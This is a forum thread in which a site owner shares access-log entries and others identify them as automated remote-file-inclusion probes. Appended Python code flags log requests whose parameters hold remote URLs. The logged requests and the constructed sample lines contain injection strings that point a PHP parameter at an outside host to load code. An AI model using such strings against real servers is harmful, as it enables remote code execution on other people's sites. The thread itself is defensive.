
spycorp-lab (10 posts)

  1. kishorebudha
    Member
    Posted 14 years ago #

    Cpanel shows the following activities from IPs:

    62.149.12.122

    *

    /ravi/2007/07/24/i-am-sivaji-mgr-and-rajini-too//manager/admin/index.php?MGR=http://www.spycorp-labs.com/echo.
    Http Code: 404 Date: Sep 11 15:30:45 Http Version: HTTP/1.1 Size in Bytes: 14616
    Referer: -
    Agent: libwww-perl/5.79

    Host: 211.171.255.102

    *

    /ravi/2007/07/24/i-am-sivaji-mgr-and-rajini-too//manager/admin/p_ins.php?MGR=http://www.spycorp-labs.com/echo.
    Http Code: 404 Date: Sep 11 15:40:41 Http Version: HTTP/1.1 Size in Bytes: 14610
    Referer: -
    Agent: libwww-perl/5.65

    Any idea what this could be?

  2. drmiketemp
    Member
    Posted 14 years ago #

    Describing what those file paths are would be helpful since they're not wpmu files, else all we can do is make guesses. Are they just showing up in your logs? Any references to actual files within your site?

    Both IP addresses are known for being harvesters though. A Google search will show you that. :)

  3. kishorebudha
    Member
    Posted 14 years ago #

  4. SteveAtty
    Member
    Posted 14 years ago #

    It's a compromised machine probing your server looking for known exploits in php files.

    It's attempting to call manager/admin/p_ins.php with a parameter which is a URL that contains code which will then be executed on the server.

    The file is not part of WPMU.

    You'll find a lot of similar probes if you look in your server logs - I get 20/30 a day.. or more. In fact I've just had 53 from 60.230.184.151

  5. drmiketemp
    Member
    Posted 14 years ago #

    I understand that. Again, though, those are not wpmu files. Does that URL match up with real files within your install or is that url just showing up in your log without regard to what files are within your site? If the files are there, what are they there for?

  6. kishorebudha
    Member
    Posted 14 years ago #

    Nope, there are no such files in my install.

  7. SteveAtty
    Member
    Posted 14 years ago #

    Which is what the 404 is telling you.

    Nothing you can do about it - the machines don't care that you've not got the software installed, they will simply run through their scripts of exploits until they've finished.

  8. drmiketemp
    Member
    Posted 14 years ago #

    Someone trolling for broken scripts:

    http://www.milw0rm.com/exploits/4387

    edit: Check out the date at the bottom of that page. This is one of the reasons why I suggest patching out of trac. That appeared just today and folks are already looking for it.

    reedit: And that html in the blog title is another reason but Donncha did a version release at the same time.

  9. kishorebudha
    Member
    Posted 14 years ago #

    drmiketemp? Do I need to do something about it?

  10. SteveAtty
    Member
    Posted 14 years ago #

    You can't stop people trolling for exploits. All you can do is ensure that anything you've got running is kept up to date - especially when it comes to security patches.
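A log check for the probe pattern discussed in this thread (a query parameter whose value is a remote URL), added here as an example and not code from any poster or from WPMU. It assumes Apache combined-format access logs; the sample lines, addresses and host names are constructed, and `find_rfi_probes` and `needs_review` are hypothetical helper names.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format (an assumption; cPanel shows the same fields).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, example host names).
SAMPLE = [
    '192.0.2.10 - - [11/Sep/2007:15:30:45 +0000] "GET /blog//manager/admin/index.php'
    '?MGR=http://files.example/echo.txt HTTP/1.1" 404 14616 "-" "libwww-perl/5.79"',
    '198.51.100.7 - - [11/Sep/2007:15:40:41 +0000] "GET /blog//manager/admin/p_ins.php'
    '?MGR=http%3A%2F%2Ffiles.example%2Fecho.txt HTTP/1.1" 404 14610 "-" "libwww-perl/5.65"',
    '203.0.113.5 - - [11/Sep/2007:15:41:02 +0000] "GET /blog/index.php'
    '?page=ftp://files.example/x HTTP/1.1" 200 5120 "-" "libwww-perl/5.65"',
    '203.0.113.9 - - [11/Sep/2007:15:42:00 +0000] "GET /blog/?s=wordpress HTTP/1.1" '
    '200 9000 "-" "Mozilla/5.0"',
]

def find_rfi_probes(lines):
    """Return {ip: [(status, path, param, agent), ...]} for requests whose
    query string carries a remote URL as a parameter value."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        parts = urlsplit(m["target"])
        # parse_qsl percent-decodes values, so http%3A%2F%2F... is caught too.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_URL.match(value.strip()):
                hits[m["ip"]].append((int(m["status"]), parts.path, name, m["agent"]))
    return dict(hits)

def needs_review(hits):
    """A 404 means the probed file is absent; any other status means the
    path exists on this server and the request deserves a closer look."""
    return sorted((ip, path) for ip, rows in hits.items()
                  for status, path, _, _ in rows if status != 404)

if __name__ == "__main__":
    found = find_rfi_probes(SAMPLE)
    print(len(found), "probing sources; review:", needs_review(found))
```

A non-404 hit is not proof of compromise, since some applications legitimately accept a URL as a parameter; it only marks the requests worth checking against the files actually installed.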
